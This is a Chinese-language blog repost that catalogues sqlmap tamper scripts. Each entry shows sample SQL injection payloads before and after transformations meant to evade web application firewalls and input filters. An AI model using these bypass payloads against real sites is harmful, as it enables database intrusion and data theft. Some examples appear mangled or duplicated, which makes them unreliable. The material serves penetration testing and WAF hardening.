Sqlmap Tamper大全

时间：2015-03-17 12:02:29 阅读：224 评论：0 收藏：0 [点我收藏+]

标签：

sqlmap是一个自动化的SQL注入工具，其主要功能是扫描，发现并利用给定的URL的SQL注入漏洞，目前支持的数据库是MS-SQL,,MYSQL,ORACLE和POSTGRESQL。SQLMAP采用四种独特的SQL注入技术，分别是盲推理SQL注入，UNION查询SQL注入，堆查询和基于时间的SQL盲注入。其广泛的功能和选项包括数据库指纹，枚举，数据库提取，访问目标文件系统，并在获取完全操作权限时实行任意命令。在许多情况下你可以通过使用sqlmap中的tamper脚本来对目标进行更高效的攻击。

本文旨在介绍tamper目录中的大部分插件，其中有的部分网上已经有了。

脚本名：apostrophemask.py

作用：用utf8代替引号

Example:

1 2	("1 AND ‘1‘=‘1") ‘1 AND %EF%BC%871%EF%BC%87=%EF%BC%871‘

Tested against:

all

—————————————————————————————

文件名：equaltolike.py

作用：like 代替等号

Example:

1 2	* Input: SELECT * FROM users WHERE id=1 * Output: SELECT * FROM users WHERE id LIKE 1

Tested against:

* Microsoft SQL Server 2005

* MySQL 4, 5.0 and 5.5

—————————————————————————————

脚本名：space2dash.py

作用：绕过过滤‘=’ 替换空格字符（”），（’ – ‘）后跟一个破折号注释，一个随机字符串和一个新行（’ n’）

Example:

1 2	(‘1 AND 9227=9227‘) ‘1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227‘

Tested against:

* MSSQL

* SQLite

—————————————————————————————

脚本名：greatest.py

作用：绕过过滤’>’ ,用GREATEST替换大于号。

Example:

1 2	(‘1 AND A > B‘) ‘1 AND GREATEST(A,B+1)=A‘

Tested against:

* MySQL 4, 5.0 and 5.5

* Oracle 10g

* PostgreSQL 8.3, 8.4, 9.0

——————————————————

脚本名：space2hash.py

作用：空格替换为#号随机字符串以及换行符

Example:

1 2	* Input: 1 AND 9227=9227 * Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227

Requirement:

* MySQL

Tested against:

* MySQL 4.0, 5.0

——————————————————

脚本名：apostrophenullencode.py

作用：绕过过滤双引号，替换字符和双引号。

Example:

1 2	tamper("1 AND ‘1‘=‘1") ‘1 AND %00%271%00%27=%00%271‘

Tested against:

* MySQL 4, 5.0 and 5.5

* Oracle 10g

* PostgreSQL 8.3, 8.4, 9.0

——————————————————

脚本名：halfversionedmorekeywords.py

作用：当数据库为mysql时绕过防火墙，每个关键字之前添加mysql版本评论

Example:

("value‘ UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa‘=‘QDWa")

"value‘/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND ‘QDWa‘=‘QDWa"

Requirement:

* MySQL < 5.1

Tested against:

* MySQL 4.0.18, 5.0.22

———————————————–

脚本名：space2morehash.py

作用：空格替换为 #号以及更多随机字符串换行符

Example:

1 2	* Input: 1 AND 9227=9227 * Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227

Requirement:

* MySQL >= 5.1.13

Tested against:

* MySQL 5.1.41

——————————————

脚本名：appendnullbyte.py

作用：在有效负荷结束位置加载零字节字符编码

Example:

1 2	(‘1 AND 1=1‘) ‘1 AND 1=1%00‘

Requirement:

* Microsoft Access

——————————————

脚本名：ifnull2ifisnull.py

作用：绕过对 IFNULL 过滤。

替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’

Example:

1 2	(‘IFNULL(1, 2)‘) ‘IF(ISNULL(1),2,1)‘

Requirement:

* MySQL

* SQLite (possibly)

* SAP MaxDB (possibly)

Tested against:

* MySQL 5.0 and 5.5

——————————————

脚本名：space2mssqlblank.py(mssql)

作用：空格替换为其它空符号

Example:

1 2	* Input: SELECT id FROM users * Output: SELECT%08id%02FROM%0Fusers

Requirement:

* Microsoft SQL Server

Tested against:

* Microsoft SQL Server 2000

* Microsoft SQL Server 2005

# ASCII table:

# SOH 01 start of heading

# STX 02 start of text

# ETX 03 end of text

# EOT 04 end of transmission

# ENQ 05 enquiry

# ACK 06 acknowledge

# BEL 07 bell

# BS 08 backspace

# TAB 09 horizontal tab

# LF 0A new line

# VT 0B vertical TAB

# FF 0C new page

# CR 0D carriage return

# SO 0E shift out

# SI 0F shift in

————————————————-

脚本名：base64encode.py

作用：用base64编码替换

Example:

1 2	("1‘ AND SLEEP(5)#") ‘MScgQU5EIFNMRUVQKDUpIw==‘

Requirement:

all

————————————————-

脚本名：space2mssqlhash.py

作用：替换空格

Example:

1 2	(‘1 AND 9227=9227‘) ‘1%23%0AAND%23%0A9227=9227‘

Requirement:

* MSSQL

* MySQL

————————————————-

脚本名：modsecurityversioned.py

作用：过滤空格，包含完整的查询版本注释

Example:

1 2	(‘1 AND 2>1--‘) ‘1 /!30874AND 2>1/--‘

Requirement:

* MySQL

Tested against:

* MySQL 5.0

————————————————-

脚本名：space2mysqlblank.py

作用：空格替换其它空白符号(mysql)

Example:

1 2	* Input: SELECT id FROM users * Output: SELECT%0Bid%0BFROM%A0users

Requirement:

* MySQL

Tested against:

* MySQL 5.1

# TAB 09 horizontal TAB

# LF 0A new line

# FF 0C new page

# CR 0D carriage return

# VT 0B vertical TAB (MySQL and Microsoft SQL Server only)

# - A0 - (MySQL only)

———————————————————————————-

脚本名：between.py

作用：用between替换大于号（>）

Example:

1 2	(‘1 AND A > B--‘) ‘1 AND A NOT BETWEEN 0 AND B--‘

Tested against:

* Microsoft SQL Server 2005

* MySQL 4, 5.0 and 5.5

* Oracle 10g

* PostgreSQL 8.3, 8.4, 9.0

———————————————————————————-

脚本名：modsecurityzeroversioned.py

作用：包含了完整的查询与零版本注释

Example:

1 2	(‘1 AND 2>1--‘) ‘1 /!00000AND 2>1/--‘

Requirement:

* MySQL

Tested against:

* MySQL 5.0

———————————————————————————-

脚本名：space2mysqldash.py

作用：替换空格字符（”）（’ – ‘）后跟一个破折号注释一个新行（’ n’）

91ri.org注：之前有个mssql的这个是mysql的

Example:

1 2	(‘1 AND 9227=9227‘) ‘1--%0AAND--%0A9227=9227‘

Requirement:

* MySQL

* MSSQL

———————————————————————————-

脚本名：multiplespaces.py

作用：围绕SQL关键字添加多个空格

Example:

1 2	(‘1 UNION SELECT foobar‘) ‘1 UNION SELECT foobar‘

Tested against:

all

———————————————————————————-

脚本名：space2plus.py

作用：用+替换空格

Example:

1 2	(‘SELECT id FROM users‘) ‘SELECT+id+FROM+users‘

Tested against:

all

———————————————————————————-

脚本名：bluecoat.py

作用：代替空格字符后与一个有效的随机空白字符的SQL语句。

然后替换=为like

Example:

1 2	(‘SELECT id FROM users where id = 1‘) ‘SELECT%09id FROM users where id LIKE 1‘

Tested against:

* MySQL 5.1, SGOS

———————————————————————————-

脚本名：nonrecursivereplacement.py

双重查询语句。取代predefined SQL关键字with表示 suitable for替代（例如 .replace（“SELECT”、””)） filters

Example:

1 2	(‘1 UNION SELECT 2--‘) ‘1 UNIOUNIONN SELESELECTCT 2--‘

Tested against:

all

———————————————————————————-

脚本名：space2randomblank.py

作用：代替空格字符（“”）从一个随机的空白字符可选字符的有效集

Example:

1 2	(‘SELECT id FROM users‘) ‘SELECT%0Did%0DFROM%0Ausers‘

Tested against:

all

———————————————————————————

脚本名：percentage.py

作用：asp允许每个字符前面添加一个%号

Example:

1 2	* Input: SELECT FIELD FROM TABLE * Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E

Requirement:

* ASP

Tested against:

* Microsoft SQL Server 2000, 2005

* MySQL 5.1.56, 5.5.11

* PostgreSQL 9.0

———————————————————————————

脚本名：sp_password.py

作用：追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾

Example:

1 2	(‘1 AND 9227=9227-- ‘) ‘1 AND 9227=9227-- sp_password‘

Requirement:

* MSSQL

———————————————————————————

脚本名：chardoubleencode.py 双url编码(不处理以编码的)

Example:

1 2	* Input: SELECT FIELD FROM%20TABLE * Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545

———————————————————————————

脚本名：unionalltounion.py

作用：替换UNION ALL SELECT UNION SELECT

Example:

1 2	(‘-1 UNION ALL SELECT‘) ‘-1 UNION SELECT‘

Requirement:

all

——————————————————————————-

脚本名：charencode.py

作用：url编码

Example:

1 2	* Input: SELECT FIELD FROM%20TABLE * Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

Tested against:

* Microsoft SQL Server 2005

* MySQL 4, 5.0 and 5.5

* Oracle 10g

* PostgreSQL 8.3, 8.4, 9.0

Notes:

Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset

The web server will anyway pass the url-decoded version behind,hence it should work against any DBMS

————————————————————

脚本名：randomcase.py

作用：随机大小写

Example:

1 2	* Input: INSERT * Output: InsERt

Tested against:

* Microsoft SQL Server 2005

* MySQL 4, 5.0 and 5.5

* Oracle 10g

* PostgreSQL 8.3, 8.4, 9.0

———————————————————————-

脚本名：unmagicquotes.py

作用：宽字符绕过 GPC addslashes

Example:

1 2	* Input: 1′ AND 1=1 * Output: 1%bf%27 AND 1=1–%20

Notes:

Useful for bypassing magic_quotes/addslashes feature

——————————————————————————–

脚本名：randomcomments.py

作用：用/**/分割sql关键字

Example:

1	‘INSERT’ becomes ‘IN//S//ERT’

————————————————————————

脚本名：versionedkeywords.py

作用：Encloses each non-function keyword with versioned MySQL comment

Example:

* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#

* Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS**!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#

Requirement:

* MySQL

—————————————————————————-

脚本名：charunicodeencode.py

作用：字符串 unicode 编码

Example:

1 2	* Input: SELECT FIELD%20FROM TABLE * Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′

Requirement:

* ASP

* ASP.NET

Tested against:

* Microsoft SQL Server 2000

* Microsoft SQL Server 2005

* MySQL 5.1.56

* PostgreSQL 9.0.3

Notes:

Useful to bypass weak web application firewalls that do not unicode url-decode the request before processing it through their ruleset

—————————————————————————-

脚本名：securesphere.py

作用：追加特制的字符串

Example:

1 2	(‘1 AND 1=1‘) "1 AND 1=1 and ‘0having‘=‘0having‘"

Tested against:

all

—————————————————————————-

脚本名：versionedmorekeywords.py

作用：注释绕过

Example:

* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#

* Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS**!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#

Requirement:

* MySQL >= 5.1.13

—————————————————————————-

脚本名：space2comment.py

作用：Replaces space character (‘ ‘) with comments ‘/**/’

Example:

1 2	* Input: SELECT id FROM users * Output: SELECT//id//FROM/**/users

Tested against:

* Microsoft SQL Server 2005

* MySQL 4, 5.0 and 5.5

* Oracle 10g

* PostgreSQL 8.3, 8.4, 9.0

Notes:

Useful to bypass weak and bespoke web application firewalls

—————————————————————————-

脚本名：halfversionedmorekeywords.py

作用：关键字前加注释

Example:

* Input: value’ UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa’=‘QDWa

* Output: value’/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND ‘QDWa’=‘QDWa

Requirement:

* MySQL < 5.1

Tested against:

* MySQL 4.0.18, 5.0.22

—————————————————————————-

原文地址：http://www.91ri.org/7852.html

Sqlmap Tamper大全

标签：

原文地址：http://www.cnblogs.com/milantgh/p/4343898.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)

周排行